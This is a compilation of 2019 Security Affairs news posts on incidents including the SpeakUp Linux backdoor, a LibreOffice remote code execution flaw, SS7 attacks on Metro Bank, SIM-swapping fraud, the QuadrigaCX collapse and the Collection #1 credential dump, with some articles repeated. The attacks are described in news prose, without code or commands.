“Although the code quality of the different clients varies, as can be seen by the distribution of the vulnerabilities we found, we argue that the remote desktop protocol is complicated, and is prone to vulnerabilities. As we demonstrated in our PoCs for both Microsoft’s client and one of the open-sourced clients, a malicious RDP server can leverage the vulnerabilities in the RDP clients to achieve remote code execution over the client’s computer,” the security firm concluded.R

The FBI Internet Crime Complaint Center (IC3) and the DHS recently issued a joint alert to highlight the rise of RDP as an attack vector.

Attackers are exploiting this feature to access systems to deploy malware such as the SamSam ransomware.

Pierluigi Paganini

(SecurityAffairs – RDP, hacking)

The post Reverse RDP Attack – Rogue RDP Server can be used to hack RDP clients appeared first on Security Affairs.

SpeakUp Linux Backdoor targets Linux servers in East Asia and LATAM.

Security experts at Check Point discovered a new backdoor dubbed
SpeakUptargeting Linux servers in East Asia and Latin America.

Malware researchers at Check Point have spotted a new Linux backdoor dubbed ‘SpeakUp’ targeting servers in East Asia and Latin America,

SpeakUp backdoor

The SpeakUp backdoor leverages known vulnerabilities in six different Linux distros, it is also able to infect Mac systems. The Trojan spread by exploiting remote code execution flaw and for the initial infection hackers leverage recently disclosed flaw in ThinkPHP (CVE-2018-20062)

Researchers linked the author of the SpeakUp backdoor with the malware developer that goes online with the moniker of Zettabithf.

Most of the infected machines are in China, the same country where was spotted the sample analyzed by Check Point on January 14, 2019.

“The sample we analyzed was observed targeting a machine in China on January 14, 2019 and was first submitted to VirusTotal on January 9 2019. At the time of writing this article, it has no detections in VT.” reads the analysis published by the experts.

Once infected the system, the backdoor connects to the command and control (C&C) server to register the machine, it gains by using cron and an internal mutex, in this way only one instance remains alive at all times.

The backdoor supports the following commands:

  • newtask – to execute arbitrary code, download and execute a file, kill or uninstall a program, and send updated fingerprint data;
  • notask – sleep for 3 seconds and ask for additional command;
  • newerconfig – to update the downloaded miner configuration file.

The backdoor uses a python script to scan and infect other Linux servers within internal and external subnets, it is also able to carry out brute-force admin panels.

The script attempts to exploit the following RCE vulnerabilities in the targeted servers:

  • CVE-2012-0874: JBoss Enterprise Application Platform Multiple Security Bypass Vulnerabilities
  • CVE-2010-1871: JBoss Seam Framework remote code execution
  • JBoss AS 3/4/5/6: Remote Command Execution (exploit)
  • CVE-2017-10271: Oracle WebLogic wlswsat Component Deserialization RCE
  • CVE-2018-2894: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware.
  • Hadoop YARN ResourceManager – Command Execution (exploit)
  • CVE-2016-3088: Apache ActiveMQ Fileserver File Upload Remote Code Execution Vulnerability.

Further researches made by the experts allowed the experts to find liteHTTP GitHub project that has some modules similar to the SpeakUp Trojan.

“SpeakUp`s obfuscated payloads and propagation technique is beyond any doubt the work of a bigger threat in the making. It is hard to imagine anyone would build such a compound array of payloads just to deploy few miners.” Check Point concludes.  

“The threat actor behind this campaign can at any given time deploy additional payloads, potentially more intrusive and offensive,”

Pierluigi Paganini

(SecurityAffairs – SpeakUp, backdoor)

The post SpeakUp Linux Backdoor targets Linux servers in East Asia and LATAM. appeared first on Security Affairs.

Severe bug in LibreOffice and OpenOffice suites allows remote code execution

A security expert discovered a severe Remote Code Execution vulnerability in the popular LibreOffice and Apache OpenOffice.

The security researcher Alex Inführ discovered a severe remote code execution vulnerability in LibreOffice and Apache OpenOffice that could be exploited by tricking victims into opening an ODT (OpenDocument Text) file embedding an event embedded. The flaw could have a huge impact because the popular free, open source office suite is used by millions of Windows, MacOS and Linux users.

Libre Office

The expert discovered that it is possible to abuse the OpenDocument scripting framework by adding an onmouseoverevent to a link included in the ODT file.

The expert devised an attack that relies on exploiting a directory traversal vulnerability tracked as CVE-2018-16858. By exploiting the vulnerability it is possible to trigger the automatic execution of a specific python library included in the suite using a hidden onmouseover event.

Inführ used a specially ODT file containing a white-colored hyperlink (he has used the white color to make it invisible in the document) that has an “onmouseover” event to execute a local python file.

The expert pointed out that the python file, named “pydoc.py,” is already included in the LibreOffice software. The suite has its own python interpreter and the file accepts arbitrary commands in one of its parameters and executes them through the system’s command line or console.

“The idea was to abuse the path traversal to traverse down into the users Download directory and load the ODT file as a python script (ergo creating a polyglot file, which is a python file + a working ODT file).” wrote the expert.

“For the solution I looked into the python parsing code a little more in depth and discovered that it is not only possible to specify the function you want to call inside a python script, but it is possible to pass parameters as well (this feature seems to be introduced in the 6.1.x branch) “

Inführ also published a video PoC of the attack that shows how to use the event to trigger the execution of a specific function within a Python file.

The expert also published the PoC exploit code for the flaw that works on Windows OS.

Inführ reported the vulnerability to LibreOffice and Apache OpenOffice on October 18. While LibreOffice addressed the flaw by the end of the October, OpenOffice is still affected by the flaw.

Inführ reported the vulnerability to LibreOffice and Apache OpenOffice on October 18 last year. While LibreOffice fixed the issue by the end of that month with the release of LibreOffice 6.0.7/6.1.3, OpenOffice still appears to be vulnerable.

RedHat assigned the flaw the CVE ID and requested the researcher to wait until January 31, 2019 for its public disclosure.

Waiting for a fix it is possible to remove or rename the pythonscript.py file in the installation folder to disable the support for python.

Pierluigi Paganini

(Security Affairs – Libre Office, hacking)

The post Severe bug in LibreOffice and OpenOffice suites allows remote code execution appeared first on Security Affairs.

Security Affairs: Roughly 500,000 Ubiquity devices may be affected by flaw already exploited in the wild

Security experts identified nearly 500,000 Ubiquity devices that may be affected by a vulnerability that has already been exploited in the wild.

Security experts are warning Ubiquity users of a vulnerability that has already been exploited in the wild.

Last week, the researcher Jim Troutman, consultant and director of the Northern New England Neutral Internet Exchange (NNENIX), revealed that threat actors had been targeting Ubiquity installs exposed online. Remote attackers were targeting the networking devices exposed via a discovery service accessible on UDP port 10001.

According to the expert, the devices are affected by a DoS flaw that attackers were attempting to trigger.

The vulnerability is not a novelty in the security and Ubiquity communities, in June the issue was discussed in a thread on the Ubiquity forums where users were warning of a possible exploit used in the wild.

Now security experts at Rapid7 revealed that they were monitoring suspicious traffic destined for port 10001 for at least one year.

Ubiquity is aware of the issue and is currently working on a firmware update that will address it anyway it is trying to downplay it.

“There has been some discussion lately about a bug in airOS which can result in management access to airOS devices becoming inoperable until these devices are rebooted. This issue appears to be caused by external access to airOS devices using port 10001. As a temporary workaround for this issue while it is being investigated and resolved by the development team, network operators can block port 10001 at the network perimeter.” reads the advisory published by Ubiquity.

“To our current knowledge, this issue cannot be used to gain control of network devices or to create a DDoS attack.” 

Waiting for a fix, Ubiquity recommends blocking UDP port 10001, but this solution could have a disruptive effect on some services.

Scanning the Internet for vulnerable devices using the Rapid7’s Sonar project, experts found roughly 490,000 devices exposed online. Most of the vulnerable Ubiquity devices are located in Brazil, followed by the United States, and Spain.

ubiquity vulnerable

“By decoding the responses, we are able to learn about the nature of these devices and clues as to how or why they are exposed publicly.” continues Rapid7. For example, by grouping by the model names returned by these responses, we see big clusters around all sorts of Ubiquiti models/devices:”

Productn
NanoStation172,563
AirGrid131,575
LiteBeam43,673
PowerBeam40,092

The analysis of the names of the device revealed that in 17,000 cases they contain the string “HACKED-ROUTER-HELP-SOS,” a circumstance that suggests that they have already been hacked by exploiting other vulnerabilities.

Rapid7 reported its findings to US-CERT, CERT Brazil, and of course Ubiquiti.

Pierluigi Paganini

(Security Affairs – SS7 protocol, Metro Bank)

The post Roughly 500,000 Ubiquity devices may be affected by flaw already exploited in the wild appeared first on Security Affairs.



Security Affairs

Roughly 500,000 Ubiquity devices may be affected by flaw already exploited in the wild

Security experts identified nearly 500,000 Ubiquity devices that may be affected by a vulnerability that has already been exploited in the wild.

Security experts are warning Ubiquity users of a vulnerability that has already been exploited in the wild.

Last week, the researcher Jim Troutman, consultant and director of the Northern New England Neutral Internet Exchange (NNENIX), revealed that threat actors had been targeting Ubiquity installs exposed online. Remote attackers were targeting the networking devices exposed via a discovery service accessible on UDP port 10001.

According to the expert, the devices are affected by a DoS flaw that attackers were attempting to trigger.

The vulnerability is not a novelty in the security and Ubiquity communities, in June the issue was discussed in a thread on the Ubiquity forums where users were warning of a possible exploit used in the wild.

Now security experts at Rapid7 revealed that they were monitoring suspicious traffic destined for port 10001 for at least one year.

Ubiquity is aware of the issue and is currently working on a firmware update that will address it anyway it is trying to downplay it.

“There has been some discussion lately about a bug in airOS which can result in management access to airOS devices becoming inoperable until these devices are rebooted. This issue appears to be caused by external access to airOS devices using port 10001. As a temporary workaround for this issue while it is being investigated and resolved by the development team, network operators can block port 10001 at the network perimeter.” reads the advisory published by Ubiquity.

“To our current knowledge, this issue cannot be used to gain control of network devices or to create a DDoS attack.” 

Waiting for a fix, Ubiquity recommends blocking UDP port 10001, but this solution could have a disruptive effect on some services.

Scanning the Internet for vulnerable devices using the Rapid7’s Sonar project, experts found roughly 490,000 devices exposed online. Most of the vulnerable Ubiquity devices are located in Brazil, followed by the United States, and Spain.

ubiquity vulnerable

“By decoding the responses, we are able to learn about the nature of these devices and clues as to how or why they are exposed publicly.” continues Rapid7. For example, by grouping by the model names returned by these responses, we see big clusters around all sorts of Ubiquiti models/devices:”

Productn
NanoStation172,563
AirGrid131,575
LiteBeam43,673
PowerBeam40,092

The analysis of the names of the device revealed that in 17,000 cases they contain the string “HACKED-ROUTER-HELP-SOS,” a circumstance that suggests that they have already been hacked by exploiting other vulnerabilities.

Rapid7 reported its findings to US-CERT, CERT Brazil, and of course Ubiquiti.

Pierluigi Paganini

(Security Affairs – SS7 protocol, Metro Bank)

The post Roughly 500,000 Ubiquity devices may be affected by flaw already exploited in the wild appeared first on Security Affairs.

Experts found popular beauty apps in the Play Store including malicious code

Researchers at Trend Micro discovered at least 29 malicious photo editing and beauty apps that were able to perform several malicious activities.

Crooks continue to abuse Google Play store to distribute malicious apps, this time experts at Trend Micro discovered at least 29 malicious
photo editing and beauty apps that were stealing users’ photos.

The malicious apps in the Google Play Store have been downloaded more than 4 million times before they were removed.

malicious camera beauty apps

The photo editing and beauty apps were including a code that could perform a broad range of malicious activities.

Experts estimated that 3 of the tainted applications (Pro Camera Beauty, Cartoon Art Photo, Emoji Camera) have been downloaded more than a million times. The Artistic Effect Filter was downloaded over 500,000 times and other seven rogue apps were installed over 100,000 times.

“We discovered several beauty camera apps (detected as AndroidOS_BadCamera.HRX) on Google Play that are capable of accessing remote ad configuration servers that can be used for malicious purposes.” reads the analysis published by Trend Micro.

“Some of these have already been downloaded millions of times, which is unsurprising given the popularity of these kinds of apps.”

When an Android user will download one of the malicious apps he will not immediately sees any suspicious behavior.

Once installed, some of these apps would redirect users to phishing websites others would push full-screen advertisements on the infected device for fraudulent or pornographic content every time the victims will unlock the device.

Some of the beauty apps were including a malicious code that uploads user’s photos to a remote server controlled by the author.

However, instead of displaying an edited photo, the apps display a picture with a fake update prompt in nine different languages.

“However, instead of getting a final result with the edited photo, the user gets a picture with a fake update prompt in nine different languages.” continues the analysis.

“The authors can collect the photos uploaded in the app, and possibly use them for malicious purposes — for example as fake profile pics in social media.”

Some of the beauty apps use packers to prevent them from being analyzed by security firms, they also hide the app icon from the list of installed applications to make it more difficult for users to uninstall them.

TrendMicro reported the list of malicious apps to Google that quickly removed them from the Play Store.

Experts recommend downloading mobile apps only from the official store and that were developed by known and trusted authors. Users can also check reviews for the apps and never install applications for which were reported anomalous behaviors.

Additional info, including Indicators of Compromise (IoCs) are reported in the post published by Trend Micro.

Pierluigi Paganini

(Security Affairs – beauty apps, malware)

The post Experts found popular beauty apps in the Play Store including malicious code appeared first on Security Affairs.

Security Affairs: QuadrigaCX exchange lost access to $145 Million funds after founder dies

QuadrigaCX Bitcoin exchange announced to have lost USD 145 million worth of cryptocurrency because the only person with access to its cold storage has died.


QuadrigaCX, the major Bitcoin exchange in Canada announced to have lost CAD 190 million (USD 145 million) worth of cryptocurrency because the only person with access to its cold (offline) storage wallets has died.

This person was Gerry Cotten, the founder and chief executive officer at QuadrigaCX. The Canadian exchange filed for legal protection from creditors in the Nova Scotia Supreme Court until it locates lost funds.

The bankruptcy hearing for QuadrigaCX is scheduled for February 5 at the same court Nova Scotia Supreme Court.

“In a sworn affidavit filed Jan. 31 with the Nova Scotia Supreme Court, Jennifer Robertson, identified as the widow of QuadrigaCX founder Gerald Cotten, said the exchange owes its customers roughly $250 million CAD ($190 million) in both cryptocurrency and fiat.” reported Coindesk.

“The company previously announced it had filed for creditor protection on its website, but the filing itself provides greater details about its predicament.

As of Jan. 31, 2019, there were roughly 115,000 users with balances signed up on the exchange, with $70 million CAD in fiat and $180 million CAD in crypto owed overall, according to the filing.

The exchange holds roughly 26,500 bitcoin ($92.3 million USD), 11,000 bitcoin cash ($1.3 million), 11,000 bitcoin cash SV ($707,000), 35,000 bitcoin gold ($352,000), nearly 200,000 litecoin ($6.5 million) and about 430,000 ether ($46 million), totaling $147 million, according to the affidavit.”

quadrigacx cryptocurrency-exchange

According to a sworn affidavit filed by Cotten’s widow Jennifer Robertson, QuadrigaCX was maintaining some CAD 260 million (USD 198 Million) in both cryptocurrencies (Bitcoin, Bitcoin Cash, Litecoin, and Ethereum) and fiat money.

The majority of the funds was stored in a cold wallet, just USD 286,000 were stored in the hot wallet of the company. A ‘cold wallet’ is used by exchanges to protect the funds from online threats, for this reason, it is a physical device that is isolated from the Internet.

The cold wallet was protected with a private key that was known only by Cotten, who unfortunately died of Crohn’s disease on December 9 in Jaipur, India.

Cotten’s wife declared that no other members of the company was in possession of the key to access the funds.

“For the past weeks, we have worked extensively to address our liquidity issues, which include attempting to locate and secure our very significant cryptocurrency reserves held in cold wallets, and that are required to satisfy customer cryptocurrency balances on deposit, as well as sourcing a financial institution to accept the bank drafts that are to be transferred to us. Unfortunately, these efforts have not been successful,” reads a message posted on the QuadrigaCX website.

Some experts don’t believe in the version provided by the QuadrigaCX team, they speculated that QuadrigaCX never dad $100 Million in is pool of funds. If confirmed, the company never had a cold wallet storing such amount of funds.

Is this an exit scam?

The researcher CryptoMed investigated the case by analyzing the blockchain of the QuadrigaCX’s Bitcoin Holdings. The experts examined TX IDs, addresses, and coin movements, and concluded that “there is no identifiable cold wallet reserves for QuadrigaCX.”

“The number of bitcoins in QuadrigaCX’s possession is substantially less than what was reported in Jennifer Robertson’s affidavit, submitted to the Canadian courts on January 31st, 2019,” reads the post published by the researcher on Medium.

“At least some of the delays in delivering crypto withdrawals to customers were due to the fact that QuadrigaCX simply did not have the funds on hand at the time. In some cases, QuadrigaCX was forced to wait for enough customer deposits to be made on the exchange before processing crypto withdrawal requests by their customers.”

“The people trying to pull off a QuadrigaCX exit scam could actually be the family and other employees, by hiding the fact that the cold wallet keys are known,” speculates bitcoin analyst Peter Todd. “Not saying this is happening, but need to consider all possibilities fairly in the investigation.”

The only certainty is that thousands of users would never be able to access their funds.

Pierluigi Paganini

(SecurityAffairs – QuadrigaCX’s , exit scam)

The post QuadrigaCX exchange lost access to $145 Million funds after founder dies appeared first on Security Affairs.



Security Affairs

QuadrigaCX exchange lost access to $145 Million funds after founder dies

QuadrigaCX Bitcoin exchange announced to have lost USD 145 million worth of cryptocurrency because the only person with access to its cold storage has died.


QuadrigaCX, the major Bitcoin exchange in Canada announced to have lost CAD 190 million (USD 145 million) worth of cryptocurrency because the only person with access to its cold (offline) storage wallets has died.

This person was Gerry Cotten, the founder and chief executive officer at QuadrigaCX. The Canadian exchange filed for legal protection from creditors in the Nova Scotia Supreme Court until it locates lost funds.

The bankruptcy hearing for QuadrigaCX is scheduled for February 5 at the same court Nova Scotia Supreme Court.

“In a sworn affidavit filed Jan. 31 with the Nova Scotia Supreme Court, Jennifer Robertson, identified as the widow of QuadrigaCX founder Gerald Cotten, said the exchange owes its customers roughly $250 million CAD ($190 million) in both cryptocurrency and fiat.” reported Coindesk.

“The company previously announced it had filed for creditor protection on its website, but the filing itself provides greater details about its predicament.

As of Jan. 31, 2019, there were roughly 115,000 users with balances signed up on the exchange, with $70 million CAD in fiat and $180 million CAD in crypto owed overall, according to the filing.

The exchange holds roughly 26,500 bitcoin ($92.3 million USD), 11,000 bitcoin cash ($1.3 million), 11,000 bitcoin cash SV ($707,000), 35,000 bitcoin gold ($352,000), nearly 200,000 litecoin ($6.5 million) and about 430,000 ether ($46 million), totaling $147 million, according to the affidavit.”

quadrigacx cryptocurrency-exchange

According to a sworn affidavit filed by Cotten’s widow Jennifer Robertson, QuadrigaCX was maintaining some CAD 260 million (USD 198 Million) in both cryptocurrencies (Bitcoin, Bitcoin Cash, Litecoin, and Ethereum) and fiat money.

The majority of the funds was stored in a cold wallet, just USD 286,000 were stored in the hot wallet of the company. A ‘cold wallet’ is used by exchanges to protect the funds from online threats, for this reason, it is a physical device that is isolated from the Internet.

The cold wallet was protected with a private key that was known only by Cotten, who unfortunately died of Crohn’s disease on December 9 in Jaipur, India.

Cotten’s wife declared that no other members of the company was in possession of the key to access the funds.

“For the past weeks, we have worked extensively to address our liquidity issues, which include attempting to locate and secure our very significant cryptocurrency reserves held in cold wallets, and that are required to satisfy customer cryptocurrency balances on deposit, as well as sourcing a financial institution to accept the bank drafts that are to be transferred to us. Unfortunately, these efforts have not been successful,” reads a message posted on the QuadrigaCX website.

Some experts don’t believe in the version provided by the QuadrigaCX team, they speculated that QuadrigaCX never dad $100 Million in is pool of funds. If confirmed, the company never had a cold wallet storing such amount of funds.

Is this an exit scam?

The researcher CryptoMed investigated the case by analyzing the blockchain of the QuadrigaCX’s Bitcoin Holdings. The experts examined TX IDs, addresses, and coin movements, and concluded that “there is no identifiable cold wallet reserves for QuadrigaCX.”

“The number of bitcoins in QuadrigaCX’s possession is substantially less than what was reported in Jennifer Robertson’s affidavit, submitted to the Canadian courts on January 31st, 2019,” reads the post published by the researcher on Medium.

“At least some of the delays in delivering crypto withdrawals to customers were due to the fact that QuadrigaCX simply did not have the funds on hand at the time. In some cases, QuadrigaCX was forced to wait for enough customer deposits to be made on the exchange before processing crypto withdrawal requests by their customers.”

“The people trying to pull off a QuadrigaCX exit scam could actually be the family and other employees, by hiding the fact that the cold wallet keys are known,” speculates bitcoin analyst Peter Todd. “Not saying this is happening, but need to consider all possibilities fairly in the investigation.”

The only certainty is that thousands of users would never be able to access their funds.

Pierluigi Paganini

(SecurityAffairs – QuadrigaCX’s , exit scam)

The post QuadrigaCX exchange lost access to $145 Million funds after founder dies appeared first on Security Affairs.

Young hacker gets 10 years jail sentence for SIM Swapping attacks

A 20-year-old college student that has stolen more than $5 million worth of cryptocurrency through SIM swapping attacks gets a 10 years jail sentence.

Joel Ortiz, a young hacker (20) who stole more than $5 million worth of cryptocurrency by hijacking victims’ phone numbers has pleaded guilty for “SIM swapping” attacks.

The college student accepted a sentence of 10 years in prison for SIM hijacking attacks against at least 40 victims.

Ortiz was arrested last year on charges of hijacking victims’ phone numbers and stealing millions of dollars in cryptocurrency.

In SIM swap frauds crooks are able to port the phone number of the victims to a new SIM card under their control.

A SIM swap fraud is a type of fraud that overwhelms the additional security measures introduced by organizations to protect their customers.

Attackers obtain victims’ information by launching a phishing campaign, or by purchasing them in the underground market.

Crooks use the information gathered on the victims in the attempt to impersonate them in front of a telco operator and ask it to provide a new SIM to replace the old one that was lost or stolen.

They can prove their identity by answering basic security questions and requesting the cancellation of the old SIM and the activation of a new one. Once obtained a new SIM, crooks can operate with the victim’s mobile account, intercepting or initiating calls, accessing SMSs (including authorizations codes sent by bank and cryptocurrency exchanges) and to authorize transactions.

Joel Ortiz is the first hacker that was condemned to the jail for SIM swapping.

“The authorities think the slow but constant drip of arrests, and Ortiz’s sentencing, will send a clear message to those who are still out there.” reported Motherboard.

“Each arrest that we made sent shockwaves through that community,” West said. “That hey weren’t safe in their basement, they weren’t safe in their room in their mom’s house, that they were being tracked down and arrested—one by one.”

SIM swapping

The sentence aims to send a clear message to SIM swappers, authorities will not tolerate this kind of crime and will persecute them with severe penalties.

According to Deputy District Director Eric West of Santa Clara County, California, Ortiz accepted a plea deal for 10 years last week, the official sentencing is set to take place on March 14th.

The case is not isolated, other hackers responsible for SIM swapping are waiting for the sentence.

Pierluigi Paganini

(SecurityAffairs – SIM Swapping, hacking)

The post Young hacker gets 10 years jail sentence for SIM Swapping attacks appeared first on Security Affairs.

Security Affairs: Metro Bank is the first bank that disclosed SS7 attacks against its customers

Metro Bank has become the first major bank to disclose SS7 attacks against its customers, but experts believe it isn’t an isolated case.

A new type of cyber attack was used for the first time against the Metro Bank, threat actors are leveraging known flaws in the SS7 signaling protocol to intercept the codes sent via text messages to customers to authorize transactions.

The Signaling System 7, aka SS7, which is a set of protocols developed in 1975 that allows the connections of one mobile phone network to another. The information passed from a network to another is needed for routing calls and text messages between several networks.

The SS7 performs out-of-band signaling in support of the call establishment, billing, routing, and information exchange functions of the public switched telephone network (PSTN).

Attackers exploited the flaw in the SS7 protocol to defeat the 2FA authentication used by Metro Bank to protect its customers.

“This activity was typically only within reach of intelligence agencies or surveillance contractors, but now Motherboard has confirmed that this capability is much more widely available in the hands of financially-driven cybercriminal groups, who are using it to empty bank accounts.” reported Motherboard that first reported the attacks.

“So-called SS7 attacks against banks are, although still relatively rare, much more prevalent than previously reported. Motherboard has identified a specific bank—the UK’s Metro Bank—that fell victim to such an attack.

ss7 Metro Bank attacks

This is not an isolated case, other banks have also been affected by this specific attack. A Metro Bank spokesman confirmed that only a “small number” of the bank’s customers had been affected.

“At Metro Bank we take our customers’ security extremely seriously and have a comprehensive range of safeguards in place to help protect them against fraud. We have supported telecommunication companies and law enforcement authorities with an industry-wide investigation and understand that steps have been taken to resolve the issue.” said the Bank spokesman.

“Of those customers impacted by this type of fraud, an extremely small number have been Metro Bank customers and none have been left out of pocket as a result. Customers should continue to remain vigilant and report any suspicious activity using the number on the back of their card or on our website.”

Metro Bank immediately informed the authorities of the attacks, but many other financial institutions that were affected by SS7 attacks have not disclosed it. 

“We are aware of a known telecommunications vulnerability being exploited to target bank accounts by intercepting SMS text messages used as 2-Factor Authentication (2FA).” said National Cyber Security Centre spokesman.

“While text messages are not the most secure type of two-factor authentication, they still offer a huge advantage over not using any 2FA at all.”

Karsten Nohl, a researcher from Security Research Labs, conducted numerous studies on the flaws affecting the SS7 protocol and confirmed that many banks suffered similar attacks.

“Some of our clients in the banking industry or other financial services; they see more and more SS7-based [requests],” Karsten Nohl, a researcher from Security Research Labs who has worked on SS7 for years, told Motherboard in a phone call. “All of a sudden you have someone’s text messages.”

Major British UK company BT confirmed that it is aware of SS7 attacks to commit banking fraud.

“Customer security is our top priority so we’re always upgrading our systems and working with the industry and banks to help protect our customers.” a BT spokesperson.

Who is behind the SS7 attacks on Metro Bank?

Experts believe there is a well-resourced and coordinate cyber criminal group of highly skilled professionals.

“[Graeme Coffey, head of sales at cybersecurity firm AdaptiveMobile] said criminals could have acquired access from legitimate providers, or are piggybacking off that access, making the SS7 requests appear somewhat more legitimate.” concludes Motherboard. “Nohl pointed to how hackers could target someone who already has SS7 access. In 2017, this reporter went undercover as an SMS routing service and was successfully offered SS7 access for around $10,000.”

Pierluigi Paganini

(Security Affairs – SS7 protocol, Metro Bank)

The post Metro Bank is the first bank that disclosed SS7 attacks against its customers appeared first on Security Affairs.



Security Affairs

Metro Bank is the first bank that disclosed SS7 attacks against its customers

Metro Bank has become the first major bank to disclose SS7 attacks against its customers, but experts believe it isn’t an isolated case.

A new type of cyber attack was used for the first time against the Metro Bank, threat actors are leveraging known flaws in the SS7 signaling protocol to intercept the codes sent via text messages to customers to authorize transactions.

The Signaling System 7, aka SS7, which is a set of protocols developed in 1975 that allows the connections of one mobile phone network to another. The information passed from a network to another is needed for routing calls and text messages between several networks.

The SS7 performs out-of-band signaling in support of the call establishment, billing, routing, and information exchange functions of the public switched telephone network (PSTN).

Attackers exploited the flaw in the SS7 protocol to defeat the 2FA authentication used by Metro Bank to protect its customers.

“This activity was typically only within reach of intelligence agencies or surveillance contractors, but now Motherboard has confirmed that this capability is much more widely available in the hands of financially-driven cybercriminal groups, who are using it to empty bank accounts.reported Motherboard that first reported the attacks.

“So-called SS7 attacks against banks are, although still relatively rare, much more prevalent than previously reported. Motherboard has identified a specific bank—the UK’s Metro Bank—that fell victim to such an attack.

ss7 Metro Bank attacks

This is not an isolated case, other banks have also been affected by this specific attack. A Metro Bank spokesman confirmed that only a “small number” of the bank’s customers had been affected.

“At Metro Bank we take our customers’ security extremely seriously and have a comprehensive range of safeguards in place to help protect them against fraud. We have supported telecommunication companies and law enforcement authorities with an industry-wide investigation and understand that steps have been taken to resolve the issue.” said the Bank spokesman.

“Of those customers impacted by this type of fraud, an extremely small number have been Metro Bank customers and none have been left out of pocket as a result. Customers should continue to remain vigilant and report any suspicious activity using the number on the back of their card or on our website.”

Metro Bank immediately informed the authorities of the attacks, but many other financial institutions that were affected by SS7 attacks have not disclosed it. 

“We are aware of a known telecommunications vulnerability being exploited to target bank accounts by intercepting SMS text messages used as 2-Factor Authentication (2FA).” said National Cyber Security Centre spokesman.

“While text messages are not the most secure type of two-factor authentication, they still offer a huge advantage over not using any 2FA at all.”

Karsten Nohl, a researcher from Security Research Labs, conducted numerous studies on the flaws affecting the SS7 protocol and confirmed that many banks suffered similar attacks.

“Some of our clients in the banking industry or other financial services; they see more and more SS7-based [requests],” Karsten Nohl, a researcher from Security Research Labs who has worked on SS7 for years, told Motherboard in a phone call. “All of a sudden you have someone’s text messages.”

Major British UK company BT confirmed that it is aware of SS7 attacks to commit banking fraud.

“Customer security is our top priority so we’re always upgrading our systems and working with the industry and banks to help protect our customers.” a BT spokesperson.

Who is behind the SS7 attacks on Metro Bank?

Experts believe there is a well-resourced and coordinate cyber criminal group of highly skilled professionals.

“[Graeme Coffey, head of sales at cybersecurity firm AdaptiveMobile] said criminals could have acquired access from legitimate providers, or are piggybacking off that access, making the SS7 requests appear somewhat more legitimate.” concludes Motherboard. “Nohl pointed to how hackers could target someone who already has SS7 access. In 2017, this reporter went undercover as an SMS routing service and was successfully offered SS7 access for around $10,000.”

Pierluigi Paganini

(Security Affairs – SS7 protocol, Metro Bank)

The post Metro Bank is the first bank that disclosed SS7 attacks against its customers appeared first on Security Affairs.

Security firm Recorded Future discovered the hacker behind Collection #1

Researchers at the threat intel firm Recorded Future, have identified the hacker who amassed credentials in Collection #1 archive.

Security experts at the threat intel firm Recorded Future, have discovered the hacker who allegedly created and offered for sale the massive collection known as Collection #1.

The ‘Collection #1’ archive was discovered by the cyber security expert Troy Hunt, it included 773 million records.

Collection #1

The responsible for the sale of the huge trove of data goes online by the moniker of “C0rpz.” C0rpz has collected a huge trove of data through credential stuffing, the ‘Collection #1’ archive is a set of email addresses and passwords totalling 2,692,818,238 rows resulting from thousands of different sources.

According to Hunt, there are 1,160,253,228 unique combinations of email addresses and passwords, while the unique email addresses totalled 772,904,991.

“Recorded Future assesses with moderate confidence that the original creator and seller of Collection #1 was the actor “C0rpz.”” reads the analysis published by Recorded Future.

“Another actor from a well-known Russian hacking forum was also observed sharing a large database of 100 billion user accounts, which possibly has some of the same datasets found in Collection #1. “

Collection #1 was included in a larger dump containing seven other databases:

  • “ANTIPUBLIC #1” (102.04 GB)
  • “AP MYR & ZABUGOR #2” (19.49 GB)
  • “Collection #1” (87.18 GB)
  • “Collection #2” (528.50 GB)
  • “Collection #3” (37.18 GB)
  • “Collection #4” (178.58 GB)
  • “Collection #5” (40.56 GB)

While the AntiPublic dump had already leaked online, the remaining ones were seen for the first time in the hacking underground last month.

According to Recorded Future, C0rpz sold the archives to other hackers that offered them for sale on multiple hacking forums, the collections were also distributed for free via online sharing service MEGA and via torrent magnet links.

Sanix and Clorox are two hackers who bought the data from C0rpz, the former was identified by the investigator Brian Krebs as the source of Collection 1, the latter is the individual who shared Collection for free on Raid Forums.

All the hackers mentioned by Recorded Future were seen for the first time by the experts of the company after the disclosure of Collection #1, they were not involved in previous campaigns or operations.

Pierluigi Paganini

(SecurityAffairs – credential stuffing, data leak)

The post Security firm Recorded Future discovered the hacker behind Collection #1 appeared first on Security Affairs.

Security Affairs: Can Enterprises execute a GRC Movement?

Managed security services or security operations, cloud security, GRC is one of the fastest growing solutions in the world.

The only place I can say more risk = more gain would be in the entrepreneurship space…because in the enterprise cyber security kingdom, it is just the opposite! So let me explain…

Before I start, stating some facts: – Global IT spend according to Gartner is 3.7 Trillion in 2018, and Cyber security market is 150 Billion which makes cyber security 4% of the total IT industry and growing at 10% CAGR …of all the various solutions under cyber security like Identity & Access, Application security, Network security, Managed security services or security operations, cloud security, GRC is one of the fastest growing solutions in the world.
Ref: https://www.gartner.com/en/information-technology/insights/cybersecurity Ref: https://www.statista.com/statistics/595182/worldwide-security-as-a-service-market-size/

GRC GLOBAL CYBER SECURITY MARKET
GLOBAL CYBER SECURITY MARKET

Ref: https://www.statista.com/statistics/595182/worldwide-security-as-a-service-market-size/

The need of the hour in the organization is the identify and mitigate risks that will seriously prohibit the growth of the business. Any business is run with governance framework and various industry regulatory compliance. Any issue in corporate governance or compliance leads to increase in risk…Hence a Platform is required whose purpose is to reduce the risk in the organization. GRC Automation platform or an Integrated Risk Management solution serves the purpose!

Just a food for thought…Even a bad code can function…but it will be disastrous! Hence it’s imperative to have a well thought coding governance structure for creating a good coding practice…similarly in the corporate governance environment, GRC programs create a good structure and are critical for managing your cybersecurity risk…even though manual processes seem to be working efficiently!

Governance Risk and Compliance (GRC) is about managing your enterprise data effectively but with data comes its security and privacy concerns too. So why not think of outsourcing or transferring the risk?…well not a good idea! Enterprises can outsource cyber security, but not risk. Risk will always be within your organization. Hence you need to contain your risk…by continuously monitoring your enterprise data. So now the challenge in managing your inhouse data! (yes data the buzz word…”whoever controls the data ..controls the world!”)

To securely house the data we need to identify which is the most critical information or PII (personally identifiable information) to be protected or what policy needs to be crafted that will protect the compliance of the various controls that are applied on the identified risks! Like the GDPR Law has shown comprehensive checks and deterrents to protect the EU citizen data. One thing to remember is that these data protection laws are not about protecting data but ultimately about people! (remember Article 17 ‘right to be forgotten’ in GDPR)

Also with digital transformation and internet proliferation cyber frauds and crime will only increase! Which means the threat to people and their privacy would always increase!

So where do we start?

